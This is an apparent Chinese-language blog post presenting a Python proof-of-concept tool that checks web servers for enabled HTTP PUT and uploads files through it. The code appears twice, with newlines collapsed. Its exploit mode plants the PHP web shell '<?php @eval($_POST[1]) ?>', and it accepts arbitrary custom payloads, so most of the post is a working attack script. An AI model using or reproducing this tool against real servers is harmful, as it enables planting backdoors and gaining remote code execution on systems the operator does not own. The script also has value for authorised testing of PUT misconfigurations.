环境

Python 2.7 requestssys
Windows 7
Apache 已完成put配置。
PHP

Apache PUT配置

简单介绍一下源码，增加易读性。

POC入口函数，设置默认变量，接受和判断用户输入参数是否合法，调用探测是否存在不安全的HTTP方法函数Test2Option(url,YN)，接受返回所支持的方法，调用PUT方法上传文件。

def main():if len(sys.argv) < 2 :print u'''Version:1.0请输入将要验证的URL(eg:Put2Poc.py http://test.com)Put2Poc.py arg1 arg2arg1：目标URLarg2: 选择(1)验证OR(2)利用(默认为验证)arg3: 选择上传文件的目录,默认为/(eg:/test/)arg4: 设置长传的文件的文件名，默认为test.htmlarg5:设置特定的利用payload(默认漏洞利用为:<?php @eval($_POST[1]) ?>)注：当前版本仅支持PHP语言的利用'''sys.exit()if len(sys.argv) >= 2 :url = sys.argv[1]YN = 1path = '/'filename = 'test.html' content = None# print urlif 'http' not in url :print u'请输入协议HTTP/HTTPS(eg:Put2Poc.py http://test.com)'sys.exit()if len(sys.argv) >= 3 :# print type(sys.argv[2])if sys.argv[2] in '2' :filename = 'test.php'if sys.argv[2] not in ['1','2'] :print u'输入的设置有误,请选择正确的设置(1:验证|2:利用)'sys.exit()YN = sys.argv[2]if len(sys.argv) >= 4 :path = sys.argv[3]if len(sys.argv) >= 5 :filename = sys.argv[4]if len(sys.argv) >= 6 :content = sys.argv[5]if len(sys.argv) > 6 :print u'请检查参数设置'sys.exit()r_options = Test2Option(url,YN)if content is not None :Put2File(url,YN,r_options,path,filename,content)else:Put2File(url,YN,r_options,path,filename)# print r_options

Error2status(code) 判断请求的返回状态。

参数 code : 请求返回的状态码

def Error2status(code):if 400 <= code < 500:return 4if 500 <= code < 600 :return 5if 200 <= code < 400 :return True

Test2Option(url,YN)探测目标URL是否支持OPTIONS方法

参数 url : 请求的URL
参数 YN : 选择验证漏洞或者利用漏洞，默认为验证。

def Test2Option(url,YN):try:r = requests.options(url,verify=False,timeout=10)except :print u'Error,请检查链接是否可以访问'sys.exit()r_options = r.headersr_status_code = Error2status(r.status_code)if r_status_code == 4 :print u'%s Client Error for url: %s' % (r.status_code,url)print u'该链接不支持OPTIONS方法'sys.exit()if r_status_code == 5 :print u'%s Server Error for url: %s' % (r.status_code,url)print u'请检查链接是否可以访问'sys.exit()if r_status_code is True :print u'该链接存在不安全的HTTP方法'print r_options['Allow']return r_options['Allow']

Put2File(url,YN,r_options,path,filename,content=None)

参数 url : 测试的URL
参数 YN : 选择验证漏洞或者利用漏洞，默认为验证。
参数 r_options : 网站所支持的HTTP请求方法。
参数 path : 文件上传位置
参数 filename : 文件名
参数 content : 自定义文件内容。

def Put2File(url,YN,r_options,path,filename,content=None):url = url.rstrip('/') + path + filenameprint urlheaders = {'Accept': '*/*','Accept-Language': 'en-US','User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Win32)'   }data = '<script>alert(1)</script>'if YN is '2':data = '<?php @eval($_POST[1]) ?>'if content is not None :data = contentr = requests.put(url,headers=headers,data=data)r_status_code = Error2status(r.status_code)if r_status_code == 4 :print u'%s Client Error for url: %s' % (r.status_code,url)print u'服务器禁止上传文件'if r_status_code == 5 :print u'%s Server Error for url: %s' % (r.status_code,url)print u'服务器禁止上传文件'if r_status_code is True :print u'Server status code: %s' %(r.status_code)print u'服务器支持PUT文件上传'print u'文件名: %s' %(filename)print u'文件内容: %s' %(data)print u'文件长传位置为: %s' %(path)print u'文件链接: %s' %(url)print r.content

POC

#/usr/bin/env python
#coding:utf-8
#
#Author:nw01f
#Date:2018.01.11
#Version:1.0
#import requests
import sysdef Error2status(code):if 400 <= code < 500:return 4if 500 <= code < 600 :return 5if 200 <= code < 400 :return Truedef Test2Option(url,YN):try:r = requests.options(url,verify=False,timeout=10)except :print u'Error,请检查链接是否可以访问'sys.exit()r_options = r.headersr_status_code = Error2status(r.status_code)if r_status_code == 4 :print u'%s Client Error for url: %s' % (r.status_code,url)print u'该链接不支持OPTIONS方法'sys.exit()if r_status_code == 5 :print u'%s Server Error for url: %s' % (r.status_code,url)print u'请检查链接是否可以访问'sys.exit()if r_status_code is True :print u'该链接存在不安全的HTTP方法'print r_options['Allow']return r_options['Allow']def Put2File(url,YN,r_options,path,filename,content=None):url = url.rstrip('/') + path + filenameprint urlheaders = {'Accept': '*/*','Accept-Language': 'en-US','User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Win32)'   }data = '<script>alert(1)</script>'if YN is '2':data = '<?php @eval($_POST[1]) ?>'if content is not None :data = contentr = requests.put(url,headers=headers,data=data)r_status_code = Error2status(r.status_code)if r_status_code == 4 :print u'%s Client Error for url: %s' % (r.status_code,url)print u'服务器禁止上传文件'if r_status_code == 5 :print u'%s Server Error for url: %s' % (r.status_code,url)print u'服务器禁止上传文件'if r_status_code is True :print u'Server status code: %s' %(r.status_code)print u'服务器支持PUT文件上传'print u'文件名: %s' %(filename)print u'文件内容: %s' %(data)print u'文件长传位置为: %s' %(path)print u'文件链接: %s' %(url)print r.contentdef main():if len(sys.argv) < 2 :print u'''Version:1.0请输入将要验证的URL(eg:Put2Poc.py http://test.com)Put2Poc.py arg1 arg2arg1：目标URLarg2: 选择(1)验证OR(2)利用(默认为验证)arg3: 选择上传文件的目录,默认为/(eg:/test/)arg4: 设置长传的文件的文件名，默认为test.htmlarg5:设置特定的利用payload(默认漏洞利用为:<?php @eval($_POST[1]) ?>)注：当前版本仅支持PHP语言的利用'''sys.exit()if len(sys.argv) >= 2 :url = sys.argv[1]YN = 1path = '/'filename = 'test.html' content = None# print urlif 'http' not in url :print u'请输入协议HTTP/HTTPS(eg:Put2Poc.py http://test.com)'sys.exit()if len(sys.argv) >= 3 :# print type(sys.argv[2])if sys.argv[2] in '2' :filename = 'test.php'if sys.argv[2] not in ['1','2'] :print u'输入的设置有误,请选择正确的设置(1:验证|2:利用)'sys.exit()YN = sys.argv[2]if len(sys.argv) >= 4 :path = sys.argv[3]if len(sys.argv) >= 5 :filename = sys.argv[4]if len(sys.argv) >= 6 :content = sys.argv[5]if len(sys.argv) > 6 :print u'请检查参数设置'sys.exit()r_options = Test2Option(url,YN)if content is not None :Put2File(url,YN,r_options,path,filename,content)else:Put2File(url,YN,r_options,path,filename)# print r_optionsif __name__ == '__main__':main()

注：欢迎指正和提出修改意见。